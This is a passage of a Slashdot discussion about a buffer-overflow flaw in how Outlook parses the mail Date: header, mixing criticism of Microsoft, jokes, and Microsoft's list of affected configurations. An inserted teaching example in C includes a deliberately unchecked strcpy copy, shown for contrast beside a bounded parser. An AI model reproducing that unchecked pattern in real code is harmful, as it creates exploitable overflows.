    3) Microsoft getting its ass kicked over a really serious security hole.

    It's a great time to be a Microsoft hater. :)

    1. Re:Interesting times by Yamao · · Score: 1

      Well, on Slashdot, anyway, where all these things are reported. Anywhere else, it's still just a necessary evil - like taxes.

      --
      Be nice to your friends. If it weren't for them, you'd be a complete stranger.
  30. Again? by Malk-a-mite · · Score: 1
    From the HNN
    "Some stories make references to both problems.
    Having Outlook security problems so frequently that they start to blur together is a dangerous thing."

    Sadly this says it all.

    Malk-a-mite

  31. Re:nothing to get excited about by Fist+Prost · · Score: 1

    That will never take off, due to the fact that most (at least most of the more popular) viruses rely on end-user action to work. This is not the case here, however once someone with half a brain sits and explains to these insurance companies that they will be insuring god-only-knows what is on people's systems, in case that person is stupid enough to click on "A special message from %S"...

    --

    Fist Prost

    "We're talking about a planet of helpdesks."
    -Jaron Lanier
  32. Re:Just to be fair here... by kaphka · · Score: 3
    This bug is a standard buffer overflow vulnerability, an accident, and not a design bug
    It's interesting, although I agree with all the facts in your post, I disagree with your attitude. In my opinion, this bug is much more disturbing than the damage caused by clueless users who run untrusted applications after countless warnings not to. This is a security hole; allowing users to send attachments is not.

    Of course, it is true that this is simply a bug, and it could have happened to anyone. But it didn't happen to anyone, it happened to Microsoft, and they deserve some measure of condemnation for it.
    --

    MSK

  33. Re:Its Time For Eudora by Anonymous Coward · · Score: 1

    This flaw is not relegated to Outlook only - any email client which uses the IE engine to display HTML content (Eudora is one such mail client) leaves the door open for this exploit. See this article at sans.org for further details.

  34. You may be vulnerable too! by Breace · · Score: 2

    From http://www.microsoft.com/technet/security/bulletin/fq00-043.asp:

    How can I tell if I'm vulnerable to this issue?

    If any of the following apply to you, you are not affected by this vulnerability:

    - You are running a default installation of Internet Explorer 5.01 Service Pack 1.
    - You are running a default installation of Internet Explorer 5.5 on any system except Windows 2000.
    - You are using Outlook and it's configured to use only MAPI

    If none of the above apply to you, you are affected by the vulnerability.

    --
    So all you Linux users, beware. :)

    Anyways, it's this kind of warped logic that caused the bug in the first place.

    Breace

  35. "OOPS, I did it again" by Bill Gates by Anonymous Coward · · Score: 5

    "Oops...I Did It Again"
    by Bill Gates

    Yeah yeah yeah yeah yeah yeah
    Yeah yeah yeah yeah yeah yeah

    I think I did it again
    I made you believe you've got security
    Oh baby
    It might seem like a feature
    But it doesn't mean that I'm serious
    'Cause to lose all my reason
    That is just so typically me
    Oh baby, baby

    :Chorus:
    Oops!...I did it again
    I created a bug, got lost in the game
    Oh baby, baby
    Oops!...You think it's secure
    That it's sent from above
    I'm not that innocent

    You see my problem is this
    I'm dreaming away
    Wishing that bugs, they don't exist
    I cry, watching bugtraq
    Can't you see I'm a fool in so many ways
    But to lose all my customers
    That is just so typically me
    Baby, oh

    :Chorus:
    Oops!...I did it again
    I created a bug, got lost in the game
    Oh baby, baby
    Oops!...You think it's secure
    That it's sent from above
    I'm not that innocent

    Yeah yeah yeah yeah yeah yeah
    Yeah yeah yeah yeah yeah yeah

    "All aboard"
    "Bill, before you go, there's something I want you to have"
    "Oh, it's beautiful, but wait a minute, isn't this...?"
    "Yeah, yes it is"
    "But I thought the old lady dropped it into the ocean in the end"
    "Well Billy, I went down and got it for you"
    "Oh, you shouldn't have"

    Oops!...I did it again to your trust
    Got lost in denial, oh baby
    Oops!...You think that I'm sent from above
    I'm not that innocent

    :Chorus:
    Oops!...I did it again
    I played with your heart, got lost in the game
    Oh baby, baby
    Oops!...You think I'm in love
    That I'm sent from above
    I'm not that innocent

    :Chorus:
    Oops!...I did it again
    I created a bug, got lost in the game
    Oh baby, baby
    Oops!...You think it's secure
    That it's sent from above
    I'm not that innocent

  36. Re:This email will self destruct in 30 seconds by generic-man · · Score: 1

    if you set the date to the distant past, say, the year of 1985

    You know you're getting old when your childhood is referred to as "the distant past."

    --
    For more information, click here.
  37. Re:Bugtraq by Evangelion · · Score: 1


    My point is that this bug has nothing to do with their security model or their philosophy, regardless of how much you want to innovate new ways to hate them.

    It's a buffer overflow in the Date: field. A bug. Pure and simple. Not the result of a design decision, or a philosophy. There have been these bugs in pretty much every major software package written in C/C++. It's only news here because /. is a nexus for MS haters.

  38. Re:Not really by rmpotter · · Score: 1

    "I thought by now, we'd be rid of buffer overflow bugs."

    You'd think wouldn't ya. L-Soft (Listserv) just released a patch for a similar buffer overrun problem here:

    http://www.lsoft.com/news/default.asp?item=Advisory1

    When I'm not using Pine, I do use Outlook on NT Systems. Amazingly, I've never had a problem with Outlook. One precaution I take is to configure Outlook so only headers are displayed -- an extra mouse click is needed to display the email body.

    As I've been saying for a few years, when *nix owns as many desktops as MS, there will probably be just as many security problems -- maybe more.

    --
    Is this sig nificant?
  39. USSR *security*? by eshaft · · Score: 2

    Did anyone else catch that the name of the South American firm in the article was "USSR"? So first Hitler escapes to South America, and now the former USSR is posing as a security firm down there too?

    --
    lf.o
  40. Re:Bugtraq by Evangelion · · Score: 2


    Do you have any idea what a buffer overflow actually is?

    Basically, you fill a fixed-size array with enough data so that you overwrite other parts of the program, do some magic (which is somewhat explained here), and then get the program to execute some arbitrary code of your own writing. Developing said code (i.e. actually writing the exploit) generally takes time, and is limited to one software/os/platform/version combination.

    This has *no* relation to how the code is initially written.

    A program which reads one line of code from the user, saves it to a fixed sized buffer, and then prints it out is vulnerable to a buffer overflow.
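
Added example (not part of the thread or any poster's code): the unchecked fixed-buffer copy described in the comment above, next to a bounded version applied to a mail `Date:` header. The 64-byte limit, the function names and the sample message are assumptions made for illustration, and folded header lines are not handled.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DATE_FIELD_MAX 64   /* assumed limit for this example */

enum date_status {
    DATE_OK = 0,
    DATE_MISSING = -1,
    DATE_TOO_LONG = -2,
    DATE_BAD_ARG = -3
};

/* The pattern the comment describes: the copy trusts the sender for length.
 * Shown for contrast only; nothing in this example calls it. */
void copy_date_unchecked(char *dst, const char *value)
{
    strcpy(dst, value);   /* writes past dst if value is longer than dst */
}

/* Case-insensitive match of "name:" at the start of a header line. */
static int line_has_name(const char *line, const char *name)
{
    size_t i;
    for (i = 0; name[i] != '\0'; i++) {
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;
    }
    return line[i] == ':';
}

/* Return a pointer to the value of header `name`, or NULL if absent.
 * Only the header block is searched: scanning stops at the first empty line. */
static const char *find_header_value(const char *msg, const char *name)
{
    const char *line = msg;
    while (*line != '\0' && *line != '\r' && *line != '\n') {
        const char *eol;
        if (line_has_name(line, name)) {
            const char *v = line + strlen(name) + 1;
            while (*v == ' ' || *v == '\t')
                v++;
            return v;
        }
        eol = strchr(line, '\n');
        if (eol == NULL)
            break;
        line = eol + 1;
    }
    return NULL;
}

/* Bounded version: measure first, then copy, and fail closed when oversized. */
int extract_date(const char *msg, char *out, size_t outsz)
{
    const char *v;
    size_t len;

    if (msg == NULL || out == NULL || outsz == 0)
        return DATE_BAD_ARG;
    out[0] = '\0';

    v = find_header_value(msg, "Date");
    if (v == NULL)
        return DATE_MISSING;

    len = strcspn(v, "\r\n");      /* length of the value on this line */
    if (len >= outsz)
        return DATE_TOO_LONG;      /* reject rather than truncate silently */

    memcpy(out, v, len);
    out[len] = '\0';
    return DATE_OK;
}

int main(void)
{
    /* Constructed sample message, not taken from any real mail. */
    const char *msg =
        "From: sender@example.test\r\n"
        "Date: Tue, 18 Jul 2000 12:34:56 -0400\r\n"
        "Subject: test\r\n"
        "\r\n"
        "body\r\n";
    char date[DATE_FIELD_MAX];
    int rc = extract_date(msg, date, sizeof date);

    printf("rc=%d date=\"%s\"\n", rc, date);
    return rc == DATE_OK ? 0 : 1;
}
```

Rejecting an oversized field outright, instead of truncating it, keeps a malformed message from being processed further with a partial value.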

  41. Moderators: by Dman33 · · Score: 2

    Why is it that when I have moderator access there is nothing worth modding up? Then there is today, I do not have mod access and here is this hilarious post that is only +1 funny!!!

    This one deserves +5!

  42. email should be text. by Error27 · · Score: 1

    I know that this is not another macro virus but still reading the article pisses me off because of this quote:

    "This vulnerability can affect a user even if the user follows what would normally be safe computing practices."

    It's absolutely horrible how badly Microsoft has infected their customers with the idea that it is only stupid users who get attacked by viruses. I just really want to slap someone in fact every time I hear that, "Hey those people shouldn't have clicked on the attachment." NO!! Email should be text. Just blame your users for your crappy programs why don't you?

    This works into so many things.

    The I was with a friend of mine setting up some software on Linux. He was treating the machine so gently, doing things slowly and not starting too many things at once. I had to tell him, "Hey this is Linux you can't hurt it. Go ahead be rough..." With Windows, users feel so bad that _they_ crashed the system. But it wasn't them it's THE CRAPPY SOFTWARE STUPID.

    Or when they are typing a document they blame themselves for not saving enough. This isn't right. That's crap. You shouldn't have to take that from a computer.

    The computer's job is not that difficult. Linux has shown that people just working for the heck of it can make decent software. There is no reason why Microsoft should be able to make some decent software. And there is NO reason to blame the users when the system crashes.

    Microsoft software may be good for playing games and for watching asf. (although it still ticks me off when the computer crashes half way through a movie.) But for doing _actual work_ it's a crappy crappy crappy system.

  43. Is Microsoft Held to a Higher Standard? by liebermonster · · Score: 1

    First a disclaimer... I do believe that Microsoft showed very little insight when including scripting capabilities in their Emails. To this day I don't know a single person who uses this capability (except for virus writers). I am not an apologist for Microsoft, just looking to put this vulnerability into perspective. Regarding the buffer overflow... Is Microsoft software really more insecure than other vendors' software? Could it be that publicity and scrutiny just makes it seem that way (I don't see a [CNN, Slashdot, MSNBC] article every time pine,sendmail,imapd,etc. has a buffer overflow vulnerability). How would Netscape and Eudora fare under the same amount of scrutiny? Do other software companies just enjoy "Security through Obscurity"?

  44. What to do until the fix is ready.... by redleg141 · · Score: 1
    M$ says you can download the latest IE to close the hole until the security fix is ready......

    Let me think..... I can use Eudora to read my email or download IE 5.5 and risk my machine being screwed up even more.

    I'm sticking with Eudora.

    1. Re:What to do until the fix is ready.... by mdaniel · · Score: 1

      Be careful, as some versions of Eudora use IE to render the message text (yes, even if you explicitly uncheck that option). If you can right click on your email and choose "View Source", you're in trouble.

      Just a thought, but I agree with you - I also use Eudora.
      -- /v\atthew

  45. Re:Security certification needed? by goodviking · · Score: 1
    There is a definite tradeoff between software security and profit. To test a system to fail-safe levels requires a significant investment in time and resources that would eliminate any profit most firms would ever make on a product. The only projects that are really able to absorb these costs are mission critical projects in which the cost of failure is measured in human lives. For the rest of the projects out there, I have found that testing is the first thing to be jettisoned in the face of deadlines (and as we move to a RAD world, everything is done in the face of someone's deadline).

    That said, I think that the idea is workable if it incorporates a sense of a graded scale that would imply security of the software engineering and testing process used by the company. Like the SEI, if you can document and demonstrate adherence to a certain set of processes, you can label your product Level 2 or 3 certified. If defects are found in the deliverable product, you must be able to identify where the process broke down and how you plan to fix it to maintain your certification level. If you can't, your level gets revoked. That way, if you buy level 1 software and get burned, caveat emptor. If you buy level 5 software, you can have confidence that it's already been put through its paces.

  46. MS' update site is ... uh ... slashdotted? by irongull · · Score: 1

    Just booted into Windows for my afternoon UT session, and sure enough, that damn 'Windows Update' window pops up. But the update site is, well, I guess slashdotted is the wrong word ;-), but it's definitely congested beyond usage. What am I supposed to do? That stupid update window has an incredibly annoying habit of popping up and totally screwing display and input while I'm running the flag back to my base, but I can't install the update 'cuz the site is screwed. I guess I'll just have to boot back into Linux and actually do some work...nah. Maybe it's a good time to check if the nvidia drivers and OpenUT are working properly together.

    And I don't even use Outlook. Grrrr.

  47. Open Source and money by Anonymous Coward · · Score: 1

    "That all changed in the late 70's when a young programmer actually had the audacity to sell his BASIC interpreter to the other programmers rather than just giving it and the source code for it away."

    The audacity?? Let me get this straight, it is bad or wrong to try to make a business out of something?? When I give my software away to people will those people, in return, provide a roof over my head or some food on my plate?? Until that starts happening don't ever criticize someone for trying to make money, no, let me rephrase, trying to make a living which is an underlying principle of this country. Capitalism did not invade this country, like a virus, 5 years ago. This country was BUILT on capitalism, ac

    Until Jeff Lewis starts putting my kids through college he shouldn't have the audacity to criticize the act of selling software

    So Eric Raymond - SO SHOVE IT.

  48. Re:Its Time For Eudora by BigBlockMopar · · Score: 2
    so you are replacing one windows program with another windows program.... WHAT THE FUCK ARE YOU DOING ON SLASHDOT?

    this site is for people smart enough to use linux.

    Maybe he wants to learn how to install and use Linux, but he has to spend so much time administering Windows clients that he can't get around to it?

    Applaud him for sparing the time to at least get away from Outlook, for which all the exploits seem to be well known.

    Time was, and still is, my problem; even after five years of experience with UNIX as a user, learning administering my first Linux box is still quite an uphill battle.

    However, you'll be pleased to note that I now type "ls -l" accidentally and frequently at DOS command prompts.

    Go easy on the Linux newbie, for together, we will all be Bill Gates' demise.

    --
    Fire and Meat. Yummy.
  49. Re:You should change your name to "sredmond" by sredding · · Score: 1

    I have not been trolled. I have not lost. Have a nice day.

  50. M$ Liability by otter42 · · Score: 1

    Just think, once UCITA gets passed in all 50 states, M$ won't even have to worry about it any more. Outlook Express will be _our_ problem.

    --
    www.eissq.com/BandP.html Ball and Plate System. Amuse your friends. Crush your enemies.
    1. Re:M$ Liability by demon · · Score: 1

      You mean, it isn't already?
      _____

      --

      Sam: "That was needlessly cryptic."
      Max: "I'd be peeing my pants if I wore any!"
  51. Re:MSNBC reports Microsoft Security Hole? by Spankophile · · Score: 1

    > I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

    Disney is the devil

  52. Yet another reason to shitcan Microsoft by codefool · · Score: 1

    'nug said.

    --
    "Stop whining!" - Arnold, as Mr. Kimble
  53. H*ll yes by Bostik · · Score: 1
    Wouldn't big program houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT) My guess is yes. Microsoft, for example, would benefit (at least in large, mission critical installations) from having their source code audited and confirmed by a third party.

    Unfortunately it wouldn't work. The big software companies are extremely reluctant to letting anyone outside their realm see the source code.

    While it certainly would help to find these biggest holes, it is quite possible that the product code itself is so shoddy, so obfuscated to begin with, that even with enough time and knowledge, it is unsure if the audit would do any good. Probably the code has never been rewritten, but only new stuff has been added and old modified, to add some new functionality.

    Isn't this how most of us write code, anyway?

    --
    There is no such thing as good luck. There is only misfortune and its occasional absence.
  54. What about Exchange? by alumshubby · · Score: 2

    Do any of these security exploits happen in Exchange? Every time an Outlook hole is revealed, we Exchange users also get the patches broadcast to us, but I don't remember hearing anything ever said about Exchange -- only Outlook, which will run on my work machine only after they fire me for refusing to have anything to do with it. :o)

    --
    "How many light bulbs does it take to change a person?" --BMcC-->
  55. Re:How long can they keep this up? by Spankophile · · Score: 2

    What!?!?

    I'd rather find a security breach in a MS product and have them release a patch, than to find a breach in some free software and be told "Fix it yourself - that's the beauty of it."

    Companies love the fact that they can hold MS responsible for their products. (Accountable to the market, if not the EULA).

  56. A future error by Veteran · · Score: 1
    July 5th 2007 - Microsoft today reported a security hole in Windows 2005. The problem has only been detected in the "hi-security" version of Windows 2005, such as those used to control nuclear weapons.

    Apparently when the clock rolled over to July 4th 2007, and the machine received any email with misspelled words, the machine will automatically post the password file for the system in plain text on usenet.

    Microsoft spokesmen called the problem minor and expected to have a bug fix in place by August 2008.

    Microsoft today sent the following email advisory to all of the affected machines. "To whom it may concern: Please do not allow your machine to receive an email with misspelled wurds."

  57. Re:This one's EVEN better by MrBogus · · Score: 1

    There are various hacks to work around SFP, but the real problem is that Microsoft failed to include a mechanism to allow the administrator to turn off SFP on a file-by-file basis.

    This may or may not have been intentional (you wouldn't want an installer turning off SFP), and it might be fixed in the future. I guess it just goes to show that you can't blow your foot off with a squirt gun.

    --

    When I hear the word 'innovation', I reach for my pistol.
  58. This one's EVEN better by zorgon · · Score: 2
    I nearly drowned from beer inhalation when I learned about this ummm...feature from a friend whose firm is an early adopter of W2K. Not that the umm...feature itself existed (what sysadmin hasn't at one time or another wished for an umm...feature like this to protect hisorher systems from lusers), but that Solitaire was one of those protected system files you couldn't delete without it being resurrected. I was ROTFLABBTMN when I heard that.

    WWJD -- What Would Jimi Do?

    --

    I am quite civilized, and I should be brought a beer immediately. -- Bruce Sterling

    1. Re:This one's EVEN better by slycer · · Score: 1

      Actually.. as long as you trash the file where it is pulling its clean files from - it's easy enough to get rid of whatever you want..

      The files are in a hidden folder c:\winnt\system32\dllcache
      Get rid of something in there, then you can delete the file that it is supposed to be backing up.

      Yes, sol.exe is in that directory - bizarre

  59. Just to be fair here... by kiscica · · Score: 5

    This bug is a standard buffer overflow vulnerability, an accident, and not a design bug like automatic or near automatic execution of executable mail content (sheesh), responsible for the previous mail worms and viruses. I do not want to be seen as defending Microsoft's practices, their ideals, or their bad program designs (e.g. aforementioned executable mail content). HOWEVER, a buffer overrun bug like this is not an inherent misfeature of Microsoft's design. It's a bug plain and simple, and furthermore one that has affected and continues to affect many, many Unix programs. This could have happened to "us", in other words. (If there were a buffer overrun problem in fetchmail, for example -- there isn't, but suppose there were.) We can and should rail at Microsoft for designing in weaknesses like that which made the ILOVEYOU fiasco possible. With a buffer overflow problem, I think that the "may he who is without sin cast the first stone" principle must apply. One of their anonymous programmers made a serious mistake. Same mistake has been made, over and over, in virtually every Unix system daemon since the Epoch. They get fixed (with an alacrity usually proportional to the consequences of an exploit) and that's that. And though I passionately believe in Open Source, please note that the fact that the source for most of those daemons has been examined by thousands and thousands of people, they never got fixed all at once. For example, -every- Red Hat Linux distribution in memory has fixed some buffer overruns and introduced others.... kiscica

    1. Re:Just to be fair here... by kiscica · · Score: 1

      Oh, I quite agree that this bug is extremely disturbing. It is potentially much more dangerous than the "executable attachment" problem since it can be exploited without the user having to do anything stupid first (I will resist adding "other than choose to use Outlook in the first place"). I certainly did not mean to imply in my original post that I am not disturbed by it. If I or anyone I knew used Outlook I would be tripping over myself right now to make sure it was not running, automatically checking every five or ten minutes a mail spool that, at any moment, could receive a message prefaced with the Header of Death.
      I just think that the blame for buffer-overrun vulnerabilities is spread very thin right now, in the sense that thousands and thousands of programmers all over the world are still writing sloppy code, under Unix as well as Windows, that fails to do appropriate bounds-checking. The designers of language libraries and perhaps even OS and hardware designers share, to some extent, some responsibility for this problem.
      Buffer overrun has been a well-known attack channel for -decades-. I distinctly remember writing exploits to get root on BSD vaxen back in the mid-eighties. We didn't think twice about it, and it was well-known then. rtm's worm used the same bug, a couple of years later.
      All hackers need to wise up about this (and library, language, and OS designers need to make it easy to avoid the error and difficult, or impossible, to commit it). I totally agree that this particular case is a bug with frightening potential consequences. I just don't think it has much to do with Microsoft per se.
      Disclaimer: I rarely use Microsoft products (although I do happen to be posting this very message from a machine running Internet Exploiter!) and have little regard for them.
      kiscica

    2. Re:Just to be fair here... by Felinoid · · Score: 1

      Microsoft has such a department and uses it to market how Microsoft is better than Linux.
      "We have professionals checking our code"
      Yet those professionals miss the kind of bugs any hobby coder would catch.

      This isn't even a "many eyes" issue it is purely an issue of a flawed development process internal to Microsoft and found no place else.

      --
      I don't actually exist.
    3. Re:Just to be fair here... by Felinoid · · Score: 1

      >Of course, it is true that this is simply a bug, and it could have happened to anyone. But it didn't happen to anyone, it happened to Microsoft, and they deserve some measure of condemnation for it.

      Anyone who introduces a defect deserves some amount of ribbing for it.
      The more people trust the code the more they deserve the ribbing...
      Note I said "Trust" not "Use" or "made to use".
      Microsoft catches hell for bad code enough to cover any given bug found.
      And no one actually trusts Microsoft's code... or if they do they deserve what they get.

      I think Microsoft should catch it for an "it could NEVER happen here" attitude they keep pushing.

      This is the kind of bug a college student makes.
      But... being a professional programmer doesn't preclude the defect. It happens because it slips our minds at the moment we are writing code.
      It hasn't happened to me yet... but quite a few times I ALMOST released code with such a bug.

      --
      I don't actually exist.
    4. Re:Just to be fair here... by Tony-A · · Score: 1

      What reason would I have to believe that this (or is it two of them now?) is the last one, or the one with my name on it? Somehow I think I'm better off not applying the patches and know that I am not safe.

    5. Re:Just to be fair here... by Tony-A · · Score: 1

      Right on. The OS and standard utilities give a pervasive impression of how good things ought to be. I think Microsoft may have set us back a couple of generations.

    6. Re:Just to be fair here... by jafac · · Score: 1

      No, it IS a big deal, because given the opportunity to fix it, Microsoft did not.

      And on the tail of several serious other exploits, which Microsoft DENIED were bugs, but instead insisted were valuable, necessary features (like the fucking bullshit SHS thing).

      This isn't a case of "he who has not sinned cast the first stone". This is the case of a marketing department making engineering decisions that adversely affect hundreds of millions of people across the world. And laughing all the way to the bank.

      if it ain't broke, then fix it 'till it is!

      --

      These are my friends, See how they glisten. See this one shine, how he smiles in the light.
    7. Re:Just to be fair here... by AdrianG · · Score: 1
      All this is true, but doesn't it seem like MS sets an awfully bad example when it comes to writing OS's and applications? When budding young programmers grow up in an environment where good programming practices are routinely sacrificed for time to market and other more questionable goals, isn't it easy to imagine these programmers getting out of the habit of thinking very much about the consequences of their coding shortcuts?

      Just a thought.

      Adrian

    8. Re:Just to be fair here... by jesterzog · · Score: 2

      It isn't so much that there's a bug that concerns me, it's that it took this long for anyone to pick it up. The bug has been in every version of Outlook, and that's been around for quite a long time now.

      In the end it was discovered by an independent entity, and considering that Microsoft doesn't traditionally open their development to outsiders, they have no control (directly or through probability) of who that entity might be. If it wasn't a security firm that discovered this first, it could have been anyone.

      IMHO, they should instead have an internal infrastructure to find these things for them before anyone else can. People trust Microsoft to provide them with secure products, yet Microsoft is at least partly relying on the users to find the security holes.


      ===
    9. Re:Just to be fair here... by Black+Parrot · · Score: 1
      > This could have happened to ?us?

      The difference being, whenever it happens to "?us?", by the time the story reaches /. the only interesting question remaining is
      Did you install the patch, or watch Baywatch instead?


      --
      --
      Sheesh, evil *and* a jerk. -- Jade
  60. Re:It's about time by scorbett · · Score: 2
    > Why is this the first internet virus
    > that someone with a brain could
    > actually fall for?

    People "with a brain" wouldn't be using such a horribly insecure mail client in the first place. There's a reason you don't hear about exploits like this affecting users of other mail clients such as Netscape Messenger (for example).

    This security hole could potentially become a nightmare, but only to those people who use Microsoft's inferior mail software. Microsoft has set back computer security by years. Take these old pieces of virus protection advice:

    • You can't get a virus simply by reading a message - not true anymore, thanks to Microsoft.
    • Viruses cannot be contained in plain text messages - also not true anymore, thanks to Microsoft's Windows Scripting Host and lame VBA viruses such as I LOVE YOU.
    • Viruses cannot be contained in image files, sound files, video clips, or other file formats, only executable binaries - still technically true, but thanks to Microsoft's "hide extensions of known types" feature, you can see viruses like "innocent_file.jpg.vbs", which appears in Microsoft clients as "innocent_file.jpg". Launching this file will, of course, trigger the virus.

    Microsoft needs to admit that Outlook is fatally flawed. Since this will never happen, it's up to people like you and me to educate and inform anyone and everyone. Companies that mandate the use of Outlook or Outlook Express (I used to work for such a company) especially need to be educated.


    --

  61. Important Exception by sulli · · Score: 1
    The Microsoft website pointed out that if you only use Microsoft Exchange Server, you're NOT affected. It only affects users of Outlook who get mail via POP3/IMAP4.

    The specifics from Microsoft:

    How can I tell if I'm vulnerable to this issue? If any of the following apply to you, you are not affected by this vulnerability:

    You are running a default installation of Internet Explorer 5.01 Service Pack 1.
    You are running a default installation of Internet Explorer 5.5 on any system except Windows 2000.
    You are using Outlook and it's configured to use only MAPI

    If none of the above apply to you, you are affected by the vulnerability.

    So the very good news is that many or most corporate users (who were highly susceptible to ILOVEYOU and related worms) will NOT be affected by this exploit. However, home, small biz, and corporate users who are using a POP3/IMAP server (or an ISP) for mail are vulnerable, and certainly everyone should upgrade when the fix is made available.

    sulli

    --

    sulli
    RTFJ.
    1. Re:Important Exception by thimo · · Score: 1

      That list is what is bugging me. Is MS really that arrogant (don't answer! :)? So, if I check the list (Running IE 5.0, not running Outlook on MAPI), I conclude that I'm affected. But how are they going to exploit my Lotus Notes (sorry, I'm at work) here or even my Netscape/Mutt at home? Duh!!! But then again, maybe I missed a line in the article that mentioned you *have* to be running Outlook to be in a position to be affected...

      Thimo
      --

      --
      Avoid the Gates of Hell. Use Linux!
  62. Re:Security certification needed? by alexpage · · Score: 1

    Wouldn't big program houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT)

    However, setting up such an authority would be incredibly difficult. There are very few people in this world who understand enough Formal Methods and Predicate Calculus to be able to stringently examine and mathematically prove code.

    Hence these people would be able to charge a fortune, putting the service out of the budget of all but the biggest companies. Even then, the sheer amount of time, even with computer-assisted methods, to examine the code of your average Microsoft bloatware would add months or even years to release dates. I can't see a company being interested in that.

  63. Who cares? I mean if you still use outlook... by Anonymous Coward · · Score: 1
    after hearing about all the shit its vulnerable to, then you're just stupid for continuing to use it. I can't believe Microsoft gets none of the blame by the press.

    It's precisely because MS is a monopoly that people just accept the cruddy software. They don't switch because there is no alternative or it would be too costly (== MS has us locked in).

    And this does not mean that crackers deserve no blame either nor am I "giving the green light" to the wannabe virus writers, but get a clue, MS is building products by welding old guns and bombs together. You don't exactly place *all* blame on someone who figures out a way to make the whole product blow up. Both sides need to share the blame, publicly.

  64. Re:MSNBC reports Microsoft Security Hole? by kableh · · Score: 1

    The article says that they learned about the vulnerability on July 1st, but hadn't released information on it, and weren't going to until a patch was available...

  65. Is your Outlook vulnerable? by ras_b · · Score: 1

    to check if your outlook settings are safe (info from this web site):

    First, verify that Outlook is configured to use MAPI. To do this, open Outlook, then select "About Microsoft Outlook" from the Help menu. If the second line in the resulting dialogue box says "Corporate or Workgroup", you're using MAPI.

    Next, verify that Outlook isn't configured to use POP3 or IMAP4. Go to the Tools menu in Outlook, then select Services. If "Internet E-mail" is not listed among the services, you are running only MAPI, and are not affected by this vulnerability.

  66. Re:Bugtraq by jovlinger · · Score: 1

    we were amused, but out of points. Sorry.

  67. MSNBC TV by latro · · Score: 1


    I saw this on MSNBC tv the other day and it just got me thinking about how irresponsible their reporting is on this issue, and how they are so proud of the fact that they are such an honest news organization that they can report fairly on problems caused by their own business partner.

    Ok, so of course they are partners with Microsoft, but how can anyone take their "news" seriously if they fail to indicate that there are other ways to fix the problem other than installing countless patches. There was an NBC reporter talking to the MSNBC host about the issue, and the reporter said that his close contacts at Redmond assured him a fix was already on the way! Whew, now I'm safe. The host did make it clear that this only affected MICROSOFT OUTLOOK, and they did state clearly that Microsoft was their partner, but the reporter then went on to say in response to this that Outlook or OE were on 3/4 of the world's computers, so really, the sw patches were the only way to go.

    Couldn't he at least have mentioned the possibility of using a different e-mail program? Of course not! But for home users, this is probably the most efficient solution - why bother keeping up with all these problems and patches if you can just install Eudora and avoid the whole issue! Irresponsible of them not to mention this. Not surprising, of course, but irresponsible.

    -------

    --

    -------

    "It was people! People soiled our green!"
  68. Re:MSNBC reports Microsoft Security Hole? by BigBlockMopar · · Score: 2
    I had hoped that NBC would retain its journalistic integrity, even when partnering with Satan, but it looks like they're under the control of Billy Boy. Sigh, one less news source to trust.

    Journalistic integrity at NBC? I don't think so. Dateline NBC is almost as sensationalist as Extra or any of the other video editions of supermarket tabloids.

    With the MSNBC partnership, I feel I can trust their reporting of Microsoft news about as well as I can trust the CBC's reporting of the state of the Canadian federal government.

    Never leave the fox guarding the henhouse.

    I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

    --
    Fire and Meat. Yummy.
  69. Re:Anyone notice this one? by TheShrike · · Score: 1
    Yep, you bet I noticed it. I submitted it as an article yesterday, but apparently, MS Security holes are news only on odd-numbered days of the week.

    --

    --
    If R is the set of all sets which don't contain themselves, does R contain itself?
  70. Re:MSNBC reports Microsoft Security Hole? by BigBlockMopar · · Score: 2
    I'll stick with ABC. World News Tonight is great, Nightline is excellent, and they're in league with Disney, not with the devil.

    Disney is the devil

    Hahaha... Well, getting back to NBC for a second, I'm a Will & Grace fan. Sorry.

    --
    Fire and Meat. Yummy.
  71. Outlook Express required to fix? by |DaBuzz| · · Score: 3

    This annoys me:

    A non-default installation of IE 5.01 SP1 or IE 5.5 also will eliminate this vulnerability, as long as an installation method is chosen that installs upgraded Outlook Express components.

    The *REASON* I did a non-default install of IE 5.5 was so I could EXCLUDE Outlook Express because I use Outlook 2000. So basically MS's Internet software is so "integrated" that you can't have one be patched for security reasons without installing all of them ... even if that means redundant email clients wasting space.

    I could care less if Microsoft is a monopoly ... this bundling/tying/integration crap must stop for exactly this freakin reason! It's like if one part of the system is insecure, it makes ALMOST ALL OTHER MS APPS vulnerable. Anyone with half a brain can see the implications of this sort of methodology to software development. So the question is, who has Microsoft's half brain?

    blarg.

    1. Re:Outlook Express required to fix? by The+Man · · Score: 2
      I could care less if Microsoft is a monopoly ... this bundling/tying/integration crap must stop for exactly this freakin reason!

      It is your attitude that allows them to engage in monopolistic business practices. If you don't like their products - and it's obvious that you have serious issues with them - then instead of whining about it on /. just stop doing business with Microsoft. It's really just that simple. Corporate profit whores are the easiest entities in the world to manipulate. All you have to do to change their ways is to choke off their profits.

      If you stick a fork in your eye, I will neither help you get it out nor sympathize with you; you stuck it in there and it's your own damn fault. Using Microsoft products is the same way. Anyone who does so is just asking for problems. I'm not claiming nobody else's products have flaws, only that Microsoft's have many more flaws than anyone else's, and as you mention their fundamental strategy merely worsens the situation. If you use them, you deserve what you get.

      Finally, I end virtually every post this way: if your employer "forces" you to use this stuff, just remember that in most countries you can always quit. So either stop whining about it or quit your job and go work elsewhere. "Whoring: Just don't do it!"

    2. Re:Outlook Express required to fix? by tftp · · Score: 1
      if your employer "forces" you to use this stuff, just remember that in most countries you can always quit

      Another way is to avoid Lookout, IE, MediaPlayer and any other apps that you don't like or don't trust. Got a special accounting package or an expensive PCB design tool? Fine, run it. Most likely PADS won't be handling your mail.

      However Internet software is available in all shapes and forms, from Pine to all those GUI mail clients. Try Netscape or Opera or Lynx... there is a choice.

      So even if you have to run Windows, most harm comes not from OS kernel but from user apps. Choose them wisely and be happy.

    3. Re:Outlook Express required to fix? by jafac · · Score: 1

      okay, can we say "Findings of Fact?" I knew you could.

      This bullshit attitude that we have a choice in the matter has been proven FALSE in a court of law.

      Microsoft has illegally driven competitors from the marketplace. There is no choice.

      if it ain't broke, then fix it 'till it is!

      --

      These are my friends, See how they glisten. See this one shine, how he smiles in the light.
    4. Re:Outlook Express required to fix? by goon · · Score: 2

